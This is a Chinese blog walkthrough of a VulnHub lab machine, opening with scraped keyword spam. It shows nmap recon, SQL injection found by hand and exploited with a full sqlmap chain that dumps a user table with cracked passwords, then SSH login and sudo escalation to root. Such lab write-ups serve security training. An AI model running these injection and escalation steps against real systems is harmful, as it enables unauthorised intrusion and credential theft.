目前热门的网站建设语言,提供网站建设哪家好,博客吧 wordpress,钢丝网片每平米价格#x1f36c; 博主介绍#x1f468;#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 hacker-routing #xff0c;很高兴认识大家~
✨主攻领域#xff1a;【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
#x1f389;点赞➕评论➕收藏… 博主介绍 博主介绍大家好我是 hacker-routing 很高兴认识大家~
✨主攻领域【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
点赞➕评论➕收藏 养成习惯一键三连
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限欢迎各位大佬指点相互学习进步 一、信息收集
1.主机探测
靶机IP地址是192.168.111.131 2.nmap扫描
端口开放了22、25、80、631端口
┌──(rootkali)-[~/桌面]
└─# nmap -sS -A 192.168.111.131nmap漏洞扫描
扫描出来这么多漏洞包括跨站请求伪造csrf、文件遍历、sql注入等
┌──(rootkali)-[~/桌面]
└─# nmap --scriptvuln -p22,25,80,631 192.168.111.131
使用 --scriptvuln 可以对目标主机或目标主机所在的网段应用弱口令检测 3.目录扫描
┌──(rootkali)-[~/桌面]
└─# dirsearch -u http://192.168.111.131二、漏洞利用
1.web渗透利用
端口开放22,25,80,631其中631关闭了22扫描没有有关的漏洞放在最后看25邮件服务80web端口从目前看是最先利用的端口了
80web端口 自己碰到这种页面可以尝试着自己多点击一下功能看看有什么突破没有
我这里在点击Blog模块然后再随机点击别的就出现了以下 的界面可能存在sql注入漏洞 在这里尝试输入不同的id值发现
输入5以后的数字就变成了一篇文章说明存在sql注入漏洞 我们现在再利用单引号去看看会不会发生报错去检测sql注入的注入点
发现报错了说明192.168.111.131/index.html?pageblogtitleBlogid5是注入点 2.sqlmap注入
sqlmap一把梭
##数据库
sqlmap -u 192.168.111.131/index.html?pageblogtitleBlogid5 --dbs --batch##表
sqlmap -u 192.168.111.131/index.html?pageblogtitleBlogid5 -D ehks --tables --batch ##列
sqlmap -u 192.168.111.131/index.html?pageblogtitleBlogid5 -D ehks -T user --columns --batch ##字段
sqlmap -u 192.168.111.131/index.html?pageblogtitleBlogid5 -D ehks -T user -C user_id,user_name,user_pass --dump --batch
数据库ehks的表user中成功发现了几个用户名和密码并对密码的md5进行了自动破解 ----------------------------------------------------------------------
| user_id | user_name | user_pass |
----------------------------------------------------------------------
| 1 | dstevens | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf) |
| 2 | achen | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| 3 | pmoore | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite) |
| 4 | jdurbin | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978) |
| 5 | sorzek | 64d1f88b9b276aece4b0edcc25b7a434 (pacman) |
| 6 | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1) |
----------------------------------------------------------------------
3.ssh远程连接
一般发现账号密码然后又开启了22端口先尝试下利用ssh远程连接
但是这里发现是ssh的版本过低的原因 经过利用chatgpt的提示得到下面的命令行成功拿到了dstevens用户的权限
ssh -oKexAlgorithmsdiffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens192.168.111.131 三、提权
1.SUID提权
发现没有什么可以利用提权的命令
[dstevensctf4 mail]$ find / -user root -perm -4000 -print 2/dev/null 2.sudo提权
sudo -l发现直接可以是最高权限 直接sudo -i拿到root权限 3.flag
可以利用find查找下flag在哪
[rootctf4 ~]# find / -name *flag*